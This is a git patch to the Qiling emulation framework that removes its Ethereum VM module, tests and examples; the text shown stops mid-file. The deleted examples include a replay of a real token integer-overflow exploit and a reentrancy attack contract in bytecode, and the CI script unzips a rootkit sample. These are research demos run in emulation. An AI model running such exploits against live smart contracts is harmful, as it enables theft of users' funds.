From a1ced6d96ebc3e5737f801aee0e541644af20f92 Mon Sep 17 00:00:00 2001 From: Zephyr Lykos Date: Mon, 8 Jan 2024 19:12:07 +0800 Subject: [PATCH] refactor: remove evm extra --- .github/workflows/build-ci.yml | 2 +- examples/evm/evm_Hexagon_overflow.py | 55 - examples/evm/evm_debugger.py | 27 - examples/evm/evm_reentrancy.py | 85 - examples/evm/evm_reentrancy_vol.py | 134 -- examples/evm/evm_simple_sc.py | 56 - examples/evm/fuzzing/.gitignore | 3 - examples/evm/fuzzing/README.md | 42 - examples/evm/fuzzing/fuzz.py | 18 - examples/evm/fuzzing/fuzz.sh | 1 - examples/evm/fuzzing/input/input0.txt | 4 - examples/evm/fuzzing/underflow_test.py | 49 - qiling/arch/evm/AUTHORS.TXT | 2 - qiling/arch/evm/__init__.py | 6 - qiling/arch/evm/_utils/__init__.py | 0 qiling/arch/evm/_utils/address.py | 31 - qiling/arch/evm/_utils/blake2/__init__.py | 0 qiling/arch/evm/_utils/blake2/coders.py | 60 - qiling/arch/evm/_utils/blake2/compression.py | 180 -- qiling/arch/evm/_utils/bn128.py | 47 - qiling/arch/evm/_utils/datatypes.py | 127 -- qiling/arch/evm/_utils/generator.py | 30 - qiling/arch/evm/_utils/numeric.py | 123 -- qiling/arch/evm/_utils/padding.py | 25 - qiling/arch/evm/_utils/transactions.py | 29 - qiling/arch/evm/abc.py | 1735 ----------------- qiling/arch/evm/abi.py | 46 - qiling/arch/evm/analysis/__init__.py | 0 qiling/arch/evm/analysis/signatures.json | 1 - qiling/arch/evm/analysis/signatures.py | 108 - qiling/arch/evm/constants.py | 191 -- qiling/arch/evm/db/__init__.py | 28 - qiling/arch/evm/db/accesslog.py | 113 -- qiling/arch/evm/db/account.py | 540 ----- qiling/arch/evm/db/atomic.py | 137 -- qiling/arch/evm/db/backends/__init__.py | 0 qiling/arch/evm/db/backends/base.py | 77 - qiling/arch/evm/db/backends/memory.py | 39 - qiling/arch/evm/db/batch.py | 87 - qiling/arch/evm/db/cache.py | 32 - qiling/arch/evm/db/diff.py | 219 --- qiling/arch/evm/db/hash_trie.py | 21 - qiling/arch/evm/db/journal.py | 444 ----- qiling/arch/evm/db/keymap.py | 49 - qiling/arch/evm/db/slow_journal.py | 447 ----- qiling/arch/evm/db/storage.py | 429 ---- qiling/arch/evm/db/witness.py | 64 - qiling/arch/evm/evm.py | 70 - qiling/arch/evm/exceptions.py | 190 -- qiling/arch/evm/hooks.py | 73 - qiling/arch/evm/precompiles/__init__.py | 9 - qiling/arch/evm/precompiles/blake2.py | 29 - qiling/arch/evm/precompiles/ecadd.py | 70 - qiling/arch/evm/precompiles/ecmul.py | 67 - qiling/arch/evm/precompiles/ecpairing.py | 124 -- qiling/arch/evm/precompiles/ecrecover.py | 63 - qiling/arch/evm/precompiles/identity.py | 18 - qiling/arch/evm/precompiles/modexp.py | 145 -- qiling/arch/evm/precompiles/ripemd160.py | 26 - qiling/arch/evm/precompiles/sha256.py | 22 - qiling/arch/evm/rlp/__init__.py | 0 qiling/arch/evm/rlp/accounts.py | 44 - qiling/arch/evm/rlp/sedes.py | 16 - qiling/arch/evm/typing.py | 114 -- qiling/arch/evm/validation.py | 254 --- qiling/arch/evm/vm/__init__.py | 0 qiling/arch/evm/vm/code_stream.py | 118 -- qiling/arch/evm/vm/computation.py | 478 ----- qiling/arch/evm/vm/dbgcui.py | 266 --- qiling/arch/evm/vm/debug.py | 313 --- qiling/arch/evm/vm/defaultconf.py | 19 - qiling/arch/evm/vm/disassembler.py | 58 - qiling/arch/evm/vm/evm.py | 90 - qiling/arch/evm/vm/exec.py | 243 --- qiling/arch/evm/vm/execution_context.py | 72 - qiling/arch/evm/vm/forks/__init__.py | 10 - qiling/arch/evm/vm/forks/berlin/__init__.py | 10 - .../arch/evm/vm/forks/berlin/computation.py | 20 - qiling/arch/evm/vm/forks/berlin/opcodes.py | 19 - qiling/arch/evm/vm/forks/berlin/state.py | 9 - .../arch/evm/vm/forks/byzantium/__init__.py | 118 -- .../evm/vm/forks/byzantium/computation.py | 32 - .../arch/evm/vm/forks/byzantium/constants.py | 12 - qiling/arch/evm/vm/forks/byzantium/opcodes.py | 136 -- qiling/arch/evm/vm/forks/byzantium/state.py | 7 - .../evm/vm/forks/constantinople/__init__.py | 10 - .../vm/forks/constantinople/computation.py | 30 - .../evm/vm/forks/constantinople/constants.py | 12 - .../evm/vm/forks/constantinople/opcodes.py | 69 - .../arch/evm/vm/forks/constantinople/state.py | 9 - .../evm/vm/forks/constantinople/storage.py | 16 - qiling/arch/evm/vm/forks/frontier/__init__.py | 10 - .../arch/evm/vm/forks/frontier/computation.py | 108 - .../arch/evm/vm/forks/frontier/constants.py | 40 - qiling/arch/evm/vm/forks/frontier/opcodes.py | 708 ------- qiling/arch/evm/vm/forks/frontier/state.py | 144 -- .../vm/forks/frontier/transaction_context.py | 5 - .../arch/evm/vm/forks/homestead/__init__.py | 9 - .../evm/vm/forks/homestead/computation.py | 65 - .../arch/evm/vm/forks/homestead/constants.py | 18 - qiling/arch/evm/vm/forks/homestead/opcodes.py | 29 - qiling/arch/evm/vm/forks/homestead/state.py | 23 - qiling/arch/evm/vm/forks/istanbul/__init__.py | 10 - .../arch/evm/vm/forks/istanbul/computation.py | 55 - .../arch/evm/vm/forks/istanbul/constants.py | 26 - qiling/arch/evm/vm/forks/istanbul/opcodes.py | 70 - qiling/arch/evm/vm/forks/istanbul/state.py | 9 - qiling/arch/evm/vm/forks/istanbul/storage.py | 24 - .../evm/vm/forks/muir_glacier/__init__.py | 10 - .../evm/vm/forks/muir_glacier/computation.py | 20 - .../arch/evm/vm/forks/muir_glacier/opcodes.py | 7 - .../arch/evm/vm/forks/muir_glacier/state.py | 9 - .../arch/evm/vm/forks/petersburg/__init__.py | 39 - .../evm/vm/forks/petersburg/computation.py | 20 - .../arch/evm/vm/forks/petersburg/constants.py | 6 - .../arch/evm/vm/forks/petersburg/opcodes.py | 63 - qiling/arch/evm/vm/forks/petersburg/state.py | 9 - .../evm/vm/forks/spurious_dragon/__init__.py | 20 - .../evm/vm/forks/spurious_dragon/_utils.py | 60 - .../vm/forks/spurious_dragon/computation.py | 75 - .../evm/vm/forks/spurious_dragon/constants.py | 13 - .../evm/vm/forks/spurious_dragon/opcodes.py | 49 - .../evm/vm/forks/spurious_dragon/state.py | 44 - .../vm/forks/tangerine_whistle/__init__.py | 18 - .../vm/forks/tangerine_whistle/computation.py | 12 - .../vm/forks/tangerine_whistle/constants.py | 14 - .../evm/vm/forks/tangerine_whistle/opcodes.py | 71 - .../evm/vm/forks/tangerine_whistle/state.py | 7 - qiling/arch/evm/vm/gas_meter.py | 80 - qiling/arch/evm/vm/host.py | 15 - qiling/arch/evm/vm/instruction.py | 51 - qiling/arch/evm/vm/interrupt.py | 128 -- qiling/arch/evm/vm/logic/__init__.py | 0 qiling/arch/evm/vm/logic/arithmetic.py | 231 --- qiling/arch/evm/vm/logic/block.py | 34 - qiling/arch/evm/vm/logic/call.py | 419 ---- qiling/arch/evm/vm/logic/comparison.py | 161 -- qiling/arch/evm/vm/logic/context.py | 210 -- qiling/arch/evm/vm/logic/duplication.py | 33 - qiling/arch/evm/vm/logic/flow.py | 64 - qiling/arch/evm/vm/logic/invalid.py | 22 - qiling/arch/evm/vm/logic/logging.py | 49 - qiling/arch/evm/vm/logic/memory.py | 43 - qiling/arch/evm/vm/logic/sha3.py | 28 - qiling/arch/evm/vm/logic/stack.py | 61 - qiling/arch/evm/vm/logic/storage.py | 133 -- qiling/arch/evm/vm/logic/swap.py | 33 - qiling/arch/evm/vm/logic/system.py | 249 --- qiling/arch/evm/vm/memory.py | 67 - qiling/arch/evm/vm/message.py | 116 -- qiling/arch/evm/vm/mnemonics.py | 174 -- qiling/arch/evm/vm/opcode.py | 79 - qiling/arch/evm/vm/opcode_values.py | 196 -- qiling/arch/evm/vm/opcodes.py | 155 -- qiling/arch/evm/vm/stack.py | 216 -- qiling/arch/evm/vm/state.py | 233 --- qiling/arch/evm/vm/transaction_context.py | 36 - qiling/arch/evm/vm/utils.py | 84 - qiling/arch/evm/vm/vm.py | 104 - qiling/const.py | 7 +- qiling/core.py | 24 +- qiling/extensions/r2/r2.py | 1 - qiling/loader/evm.py | 24 - qiling/utils.py | 6 +- setup.py | 20 +- tests/test_evm.py | 161 -- tests/test_onlinux.sh | 1 - tests/test_r2.py | 35 - 168 files changed, 9 insertions(+), 15146 deletions(-) delete mode 100644 examples/evm/evm_Hexagon_overflow.py delete mode 100644 examples/evm/evm_debugger.py delete mode 100644 examples/evm/evm_reentrancy.py delete mode 100644 examples/evm/evm_reentrancy_vol.py delete mode 100644 examples/evm/evm_simple_sc.py delete mode 100644 examples/evm/fuzzing/.gitignore delete mode 100644 examples/evm/fuzzing/README.md delete mode 100644 examples/evm/fuzzing/fuzz.py delete mode 100755 examples/evm/fuzzing/fuzz.sh delete mode 100644 examples/evm/fuzzing/input/input0.txt delete mode 100644 examples/evm/fuzzing/underflow_test.py delete mode 100644 qiling/arch/evm/AUTHORS.TXT delete mode 100644 qiling/arch/evm/__init__.py delete mode 100644 qiling/arch/evm/_utils/__init__.py delete mode 100644 qiling/arch/evm/_utils/address.py delete mode 100644 qiling/arch/evm/_utils/blake2/__init__.py delete mode 100644 qiling/arch/evm/_utils/blake2/coders.py delete mode 100644 qiling/arch/evm/_utils/blake2/compression.py delete mode 100644 qiling/arch/evm/_utils/bn128.py delete mode 100644 qiling/arch/evm/_utils/datatypes.py delete mode 100644 qiling/arch/evm/_utils/generator.py delete mode 100644 qiling/arch/evm/_utils/numeric.py delete mode 100644 qiling/arch/evm/_utils/padding.py delete mode 100644 qiling/arch/evm/_utils/transactions.py delete mode 100644 qiling/arch/evm/abc.py delete mode 100644 qiling/arch/evm/abi.py delete mode 100644 qiling/arch/evm/analysis/__init__.py delete mode 100644 qiling/arch/evm/analysis/signatures.json delete mode 100644 qiling/arch/evm/analysis/signatures.py delete mode 100644 qiling/arch/evm/constants.py delete mode 100644 qiling/arch/evm/db/__init__.py delete mode 100644 qiling/arch/evm/db/accesslog.py delete mode 100644 qiling/arch/evm/db/account.py delete mode 100644 qiling/arch/evm/db/atomic.py delete mode 100644 qiling/arch/evm/db/backends/__init__.py delete mode 100644 qiling/arch/evm/db/backends/base.py delete mode 100644 qiling/arch/evm/db/backends/memory.py delete mode 100644 qiling/arch/evm/db/batch.py delete mode 100644 qiling/arch/evm/db/cache.py delete mode 100644 qiling/arch/evm/db/diff.py delete mode 100644 qiling/arch/evm/db/hash_trie.py delete mode 100644 qiling/arch/evm/db/journal.py delete mode 100644 qiling/arch/evm/db/keymap.py delete mode 100644 qiling/arch/evm/db/slow_journal.py delete mode 100644 qiling/arch/evm/db/storage.py delete mode 100644 qiling/arch/evm/db/witness.py delete mode 100644 qiling/arch/evm/evm.py delete mode 100644 qiling/arch/evm/exceptions.py delete mode 100644 qiling/arch/evm/hooks.py delete mode 100644 qiling/arch/evm/precompiles/__init__.py delete mode 100644 qiling/arch/evm/precompiles/blake2.py delete mode 100644 qiling/arch/evm/precompiles/ecadd.py delete mode 100644 qiling/arch/evm/precompiles/ecmul.py delete mode 100644 qiling/arch/evm/precompiles/ecpairing.py delete mode 100644 qiling/arch/evm/precompiles/ecrecover.py delete mode 100644 qiling/arch/evm/precompiles/identity.py delete mode 100644 qiling/arch/evm/precompiles/modexp.py delete mode 100644 qiling/arch/evm/precompiles/ripemd160.py delete mode 100644 qiling/arch/evm/precompiles/sha256.py delete mode 100644 qiling/arch/evm/rlp/__init__.py delete mode 100644 qiling/arch/evm/rlp/accounts.py delete mode 100644 qiling/arch/evm/rlp/sedes.py delete mode 100644 qiling/arch/evm/typing.py delete mode 100644 qiling/arch/evm/validation.py delete mode 100644 qiling/arch/evm/vm/__init__.py delete mode 100644 qiling/arch/evm/vm/code_stream.py delete mode 100644 qiling/arch/evm/vm/computation.py delete mode 100644 qiling/arch/evm/vm/dbgcui.py delete mode 100644 qiling/arch/evm/vm/debug.py delete mode 100644 qiling/arch/evm/vm/defaultconf.py delete mode 100644 qiling/arch/evm/vm/disassembler.py delete mode 100644 qiling/arch/evm/vm/evm.py delete mode 100644 qiling/arch/evm/vm/exec.py delete mode 100644 qiling/arch/evm/vm/execution_context.py delete mode 100644 qiling/arch/evm/vm/forks/__init__.py delete mode 100644 qiling/arch/evm/vm/forks/berlin/__init__.py delete mode 100644 qiling/arch/evm/vm/forks/berlin/computation.py delete mode 100644 qiling/arch/evm/vm/forks/berlin/opcodes.py delete mode 100644 qiling/arch/evm/vm/forks/berlin/state.py delete mode 100644 qiling/arch/evm/vm/forks/byzantium/__init__.py delete mode 100644 qiling/arch/evm/vm/forks/byzantium/computation.py delete mode 100644 qiling/arch/evm/vm/forks/byzantium/constants.py delete mode 100644 qiling/arch/evm/vm/forks/byzantium/opcodes.py delete mode 100644 qiling/arch/evm/vm/forks/byzantium/state.py delete mode 100644 qiling/arch/evm/vm/forks/constantinople/__init__.py delete mode 100644 qiling/arch/evm/vm/forks/constantinople/computation.py delete mode 100644 qiling/arch/evm/vm/forks/constantinople/constants.py delete mode 100644 qiling/arch/evm/vm/forks/constantinople/opcodes.py delete mode 100644 qiling/arch/evm/vm/forks/constantinople/state.py delete mode 100644 qiling/arch/evm/vm/forks/constantinople/storage.py delete mode 100644 qiling/arch/evm/vm/forks/frontier/__init__.py delete mode 100644 qiling/arch/evm/vm/forks/frontier/computation.py delete mode 100644 qiling/arch/evm/vm/forks/frontier/constants.py delete mode 100644 qiling/arch/evm/vm/forks/frontier/opcodes.py delete mode 100644 qiling/arch/evm/vm/forks/frontier/state.py delete mode 100644 qiling/arch/evm/vm/forks/frontier/transaction_context.py delete mode 100644 qiling/arch/evm/vm/forks/homestead/__init__.py delete mode 100644 qiling/arch/evm/vm/forks/homestead/computation.py delete mode 100644 qiling/arch/evm/vm/forks/homestead/constants.py delete mode 100644 qiling/arch/evm/vm/forks/homestead/opcodes.py delete mode 100644 qiling/arch/evm/vm/forks/homestead/state.py delete mode 100644 qiling/arch/evm/vm/forks/istanbul/__init__.py delete mode 100644 qiling/arch/evm/vm/forks/istanbul/computation.py delete mode 100644 qiling/arch/evm/vm/forks/istanbul/constants.py delete mode 100644 qiling/arch/evm/vm/forks/istanbul/opcodes.py delete mode 100644 qiling/arch/evm/vm/forks/istanbul/state.py delete mode 100644 qiling/arch/evm/vm/forks/istanbul/storage.py delete mode 100644 qiling/arch/evm/vm/forks/muir_glacier/__init__.py delete mode 100644 qiling/arch/evm/vm/forks/muir_glacier/computation.py delete mode 100644 qiling/arch/evm/vm/forks/muir_glacier/opcodes.py delete mode 100644 qiling/arch/evm/vm/forks/muir_glacier/state.py delete mode 100644 qiling/arch/evm/vm/forks/petersburg/__init__.py delete mode 100644 qiling/arch/evm/vm/forks/petersburg/computation.py delete mode 100644 qiling/arch/evm/vm/forks/petersburg/constants.py delete mode 100644 qiling/arch/evm/vm/forks/petersburg/opcodes.py delete mode 100644 qiling/arch/evm/vm/forks/petersburg/state.py delete mode 100644 qiling/arch/evm/vm/forks/spurious_dragon/__init__.py delete mode 100644 qiling/arch/evm/vm/forks/spurious_dragon/_utils.py delete mode 100644 qiling/arch/evm/vm/forks/spurious_dragon/computation.py delete mode 100644 qiling/arch/evm/vm/forks/spurious_dragon/constants.py delete mode 100644 qiling/arch/evm/vm/forks/spurious_dragon/opcodes.py delete mode 100644 qiling/arch/evm/vm/forks/spurious_dragon/state.py delete mode 100644 qiling/arch/evm/vm/forks/tangerine_whistle/__init__.py delete mode 100644 qiling/arch/evm/vm/forks/tangerine_whistle/computation.py delete mode 100644 qiling/arch/evm/vm/forks/tangerine_whistle/constants.py delete mode 100644 qiling/arch/evm/vm/forks/tangerine_whistle/opcodes.py delete mode 100644 qiling/arch/evm/vm/forks/tangerine_whistle/state.py delete mode 100644 qiling/arch/evm/vm/gas_meter.py delete mode 100644 qiling/arch/evm/vm/host.py delete mode 100644 qiling/arch/evm/vm/instruction.py delete mode 100644 qiling/arch/evm/vm/interrupt.py delete mode 100644 qiling/arch/evm/vm/logic/__init__.py delete mode 100644 qiling/arch/evm/vm/logic/arithmetic.py delete mode 100644 qiling/arch/evm/vm/logic/block.py delete mode 100644 qiling/arch/evm/vm/logic/call.py delete mode 100644 qiling/arch/evm/vm/logic/comparison.py delete mode 100644 qiling/arch/evm/vm/logic/context.py delete mode 100644 qiling/arch/evm/vm/logic/duplication.py delete mode 100644 qiling/arch/evm/vm/logic/flow.py delete mode 100644 qiling/arch/evm/vm/logic/invalid.py delete mode 100644 qiling/arch/evm/vm/logic/logging.py delete mode 100644 qiling/arch/evm/vm/logic/memory.py delete mode 100644 qiling/arch/evm/vm/logic/sha3.py delete mode 100644 qiling/arch/evm/vm/logic/stack.py delete mode 100644 qiling/arch/evm/vm/logic/storage.py delete mode 100644 qiling/arch/evm/vm/logic/swap.py delete mode 100644 qiling/arch/evm/vm/logic/system.py delete mode 100644 qiling/arch/evm/vm/memory.py delete mode 100644 qiling/arch/evm/vm/message.py delete mode 100644 qiling/arch/evm/vm/mnemonics.py delete mode 100644 qiling/arch/evm/vm/opcode.py delete mode 100644 qiling/arch/evm/vm/opcode_values.py delete mode 100644 qiling/arch/evm/vm/opcodes.py delete mode 100644 qiling/arch/evm/vm/stack.py delete mode 100644 qiling/arch/evm/vm/state.py delete mode 100644 qiling/arch/evm/vm/transaction_context.py delete mode 100644 qiling/arch/evm/vm/utils.py delete mode 100644 qiling/arch/evm/vm/vm.py delete mode 100644 qiling/loader/evm.py delete mode 100644 tests/test_evm.py diff --git a/.github/workflows/build-ci.yml b/.github/workflows/build-ci.yml index 2dc4b7663..bf039b710 100644 --- a/.github/workflows/build-ci.yml +++ b/.github/workflows/build-ci.yml @@ -77,7 +77,7 @@ jobs: cd ../qiling cd ../examples/rootfs/x86_linux/kernel && unzip -P infected m0hamed_rootkit.ko.zip cd ../../../../ - pip3 install -e .[evm,RE] + pip3 install -e .[RE] if [ ${{ matrix.os }} == 'ubuntu-18.04' ] and [ ${{ matrix.python-version }} == '3.9' ]; then docker run -it --rm -v ${GITHUB_WORKSPACE}:/qiling qilingframework/qiling:dev bash -c "cd tests && ./test_onlinux.sh" diff --git a/examples/evm/evm_Hexagon_overflow.py b/examples/evm/evm_Hexagon_overflow.py deleted file mode 100644 index c26f0938d..000000000 --- a/examples/evm/evm_Hexagon_overflow.py +++ /dev/null @@ -1,55 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -# https://etherscan.io/tx/0x9243d45ca81db4f16a0ded3e57982b4bc95ec32ce69d541bf6e019d949cbc6c8 -# https://www.anquanke.com/post/id/145520 - -import sys -sys.path.append("../..") - -from qiling import Qiling -from qiling.const import QL_ARCH - - -def example_run_evm(): - contract = '0x606060405266017dfcdece4000600055341561001a57600080fd5b600160a060020a033316600090815260016020526040902066017dfcdece400090556106eb8061004b6000396000f3006060604052600436106100c45763ffffffff7c010000000000000000000000000000000000000000000000000000000060003504166306fdde0381146100c9578063095ea7b31461015357806318160ddd1461018957806323b872dd146101ae57806327edf097146101d6578063313ce567146101ff578063378dc3dc1461021257806342966c681461022557806370a082311461023b578063771282f61461025a57806395d89b411461026d578063a9059cbb14610280578063dd62ed3e146102a2575b600080fd5b34156100d457600080fd5b6100dc6102c7565b60405160208082528190810183818151815260200191508051906020019080838360005b83811015610118578082015183820152602001610100565b50505050905090810190601f1680156101455780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b341561015e57600080fd5b610175600160a060020a03600435166024356102fe565b604051901515815260200160405180910390f35b341561019457600080fd5b61019c6103a4565b60405190815260200160405180910390f35b34156101b957600080fd5b610175600160a060020a03600435811690602435166044356103aa565b34156101e157600080fd5b6101e9610422565b60405160ff909116815260200160405180910390f35b341561020a57600080fd5b6101e9610427565b341561021d57600080fd5b61019c61042c565b341561023057600080fd5b610175600435610437565b341561024657600080fd5b61019c600160a060020a03600435166104ea565b341561026557600080fd5b61019c6104fc565b341561027857600080fd5b6100dc610502565b341561028b57600080fd5b610175600160a060020a0360043516602435610539565b34156102ad57600080fd5b61019c600160a060020a036004358116906024351661054f565b60408051908101604052600781527f48657861676f6e00000000000000000000000000000000000000000000000000602082015281565b60008115806103305750600160a060020a03338116600090815260026020908152604080832093871683529290522054155b151561033b57600080fd5b600160a060020a03338116600081815260026020908152604080832094881680845294909152908190208590557f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259085905190815260200160405180910390a350600192915050565b60005490565b600160a060020a03808416600090815260026020908152604080832033909416835292905290812054829010156103e057600080fd5b600160a060020a038085166000908152600260209081526040808320339094168352929052208054839003905561041884848461056c565b5060019392505050565b600281565b600481565b66017dfcdece400081565b600160a060020a0333166000908152600160205260408120548290101561045d57600080fd5b600160a060020a033316600081815260016020526040808220805486900390558180527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4980548601905581548590039091557fcc16f5dbb4873280815c1ee09dbd06736cffcc184412cf7a71a0fdb75d397ca59084905190815260200160405180910390a2506001919050565b60016020526000908152604090205481565b60005481565b60408051908101604052600381527f4858470000000000000000000000000000000000000000000000000000000000602082015281565b600061054633848461056c565b50600192915050565b600260209081526000928352604080842090915290825290205481565b600160a060020a038216151561058157600080fd5b600160a060020a038316600090815260016020526040902054600282019010156105aa57600080fd5b600160a060020a038216600090815260016020526040902054818101116105d057600080fd5b600160a060020a03808416600081815260016020526040808220805460011990879003810190915593861682528082208054860190558180527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4980546002908101909155825490940190915590917fcc16f5dbb4873280815c1ee09dbd06736cffcc184412cf7a71a0fdb75d397ca5915160ff909116815260200160405180910390a281600160a060020a031683600160a060020a03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405190815260200160405180910390a35050505600a165627a7a72305820fbef5b10322242b8659b5de8e24ec1cf5e809831f6f7c08e52112f76daa31aef0029' - ql = Qiling(code=contract, archtype=QL_ARCH.EVM) - - user1 = ql.arch.evm.create_account(balance=100*10**18) - user2 = ql.arch.evm.create_account(balance=100*10**18) - c1 = ql.arch.evm.create_account() - - def check_balance(sender, destination): - call_data = '0x70a08231'+ql.arch.evm.abi.convert(['address'], [sender]) - msg2 = ql.arch.evm.create_message(sender, destination, data=call_data) - return ql.run(code=msg2) - - # Deploy runtime code - msg0 = ql.arch.evm.create_message(user1, b'', code=contract, contract_address=c1) - ql.run(code=msg0) - - # # SMART CONTRACT DEPENDENT: check balance of user1 - result = check_balance(user1, c1) - print('User1 balance =', int(result.output.hex()[2:], 16)) - - # # SMART CONTRACT DEPENDENT: transform from user1 to user2 - call_data = '0xa9059cbb'+ ql.arch.evm.abi.convert(['address'], [user2]) + \ - ql.arch.evm.abi.convert(['uint256'], [0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe]) - msg1 = ql.arch.evm.create_message(user1, c1, data=call_data) - result = ql.run(code=msg1) - - if int(result.output.hex()[2:], 16) == 1: - print('User1 transfered Token to User1') - - # # SMART CONTRACT DEPENDENT: User1 balance underflow, MAX - 1 - result = check_balance(user1, c1) - print('User1 final balance =', int(result.output.hex()[2:], 16)) - - result = check_balance(user2, c1) - print('User2 final balance =', int(result.output.hex()[2:], 16)) - - -if __name__ == "__main__": - example_run_evm() diff --git a/examples/evm/evm_debugger.py b/examples/evm/evm_debugger.py deleted file mode 100644 index 9a6e53954..000000000 --- a/examples/evm/evm_debugger.py +++ /dev/null @@ -1,27 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import sys -sys.path.append("../..") - -from qiling import Qiling -from qiling.const import QL_ARCH - - -if __name__ == '__main__': - contract = '0x6060604052341561000f57600080fd5b60405160208061031c833981016040528080519060200190919050508060018190556000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050610299806100836000396000f300606060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806318160ddd1461005c57806370a0823114610085578063a9059cbb146100d2575b600080fd5b341561006757600080fd5b61006f61012c565b6040518082815260200191505060405180910390f35b341561009057600080fd5b6100bc600480803573ffffffffffffffffffffffffffffffffffffffff16906020019091905050610132565b6040518082815260200191505060405180910390f35b34156100dd57600080fd5b610112600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190803590602001909190505061017a565b604051808215151515815260200191505060405180910390f35b60015481565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b600080826000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403101515156101cb57600080fd5b816000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540392505081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555060019050929150505600a165627a7a7230582098f1551a391a3e65b3ce45cfa2b3fa5f91eea9a3e7181a81454e025ea0d7151c0029' - ql = Qiling(code=contract, archtype=QL_ARCH.EVM) - ql.debugger = True - - # Add Balance Var to the contract - bal = ql.arch.evm.abi.convert(['uint256'], [20]) - contract = contract + bal - - user1 = ql.arch.evm.create_account(balance=100*10**18) - user2 = ql.arch.evm.create_account(balance=100*10**18) - c1 = ql.arch.evm.create_account() - - msg0 = ql.arch.evm.create_message(user1, b'', code=contract, contract_address=c1) - ql.run(code=msg0) \ No newline at end of file diff --git a/examples/evm/evm_reentrancy.py b/examples/evm/evm_reentrancy.py deleted file mode 100644 index 09100f6cd..000000000 --- a/examples/evm/evm_reentrancy.py +++ /dev/null @@ -1,85 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import sys -sys.path.append("../..") - -from qiling import Qiling -from qiling.arch.evm.vm.utils import bytecode_to_bytes, runtime_code_detector -from qiling.arch.evm.vm.vm import BaseVM -from qiling.arch.evm.constants import CREATE_CONTRACT_ADDRESS -from qiling.const import QL_ARCH - - -if __name__ == '__main__': - # Attack_contract = '0x608060405234801561001057600080fd5b5060405160208061046d83398101806040528101908080519060200190929190505050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550506103ea806100836000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680636289d38514610152578063acd2e6e51461015c578063ff11e1db146101b3575b670de0b6b3a76400006000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16311115610150576000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663155dd5ee670de0b6b3a76400006040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180828152602001915050600060405180830381600087803b15801561013757600080fd5b505af115801561014b573d6000803e3d6000fd5b505050505b005b61015a6101ca565b005b34801561016857600080fd5b50610171610339565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156101bf57600080fd5b506101c861035e565b005b670de0b6b3a764000034101515156101e157600080fd5b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663e2c41dbc670de0b6b3a76400006040518263ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004016000604051808303818588803b15801561026e57600080fd5b505af1158015610282573d6000803e3d6000fd5b50505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663155dd5ee670de0b6b3a76400006040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180828152602001915050600060405180830381600087803b15801561031f57600080fd5b505af1158015610333573d6000803e3d6000fd5b50505050565b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b3373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f193505050501580156103bb573d6000803e3d6000fd5b505600a165627a7a723058204ad3139b1085c12112b76e9eab70c6589942d6e84eb3d8329a644eca757c19d00029' - Attack_contract = '0x608060405234801561001057600080fd5b506040516020806104b883398101806040528101908080519060200190929190505050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050610435806100836000396000f30060806040526004361061004c576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063a75e462514610179578063ff11e1db146101e1575b670de0b6b3a76400006000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16311115610177576000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16600060149054906101000a90047c0100000000000000000000000000000000000000000000000000000000027c01000000000000000000000000000000000000000000000000000000009004670de0b6b3a76400006040518263ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808267ffffffffffffffff1681526020019150506000604051808303816000875af192505050505b005b6101df60048036038101908080357bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916906020019092919080357bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191690602001909291905050506101f8565b005b3480156101ed57600080fd5b506101f66103a9565b005b80600060146101000a81548163ffffffff02191690837c010000000000000000000000000000000000000000000000000000000090040217905550670de0b6b3a7640000341015151561024a57600080fd5b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1667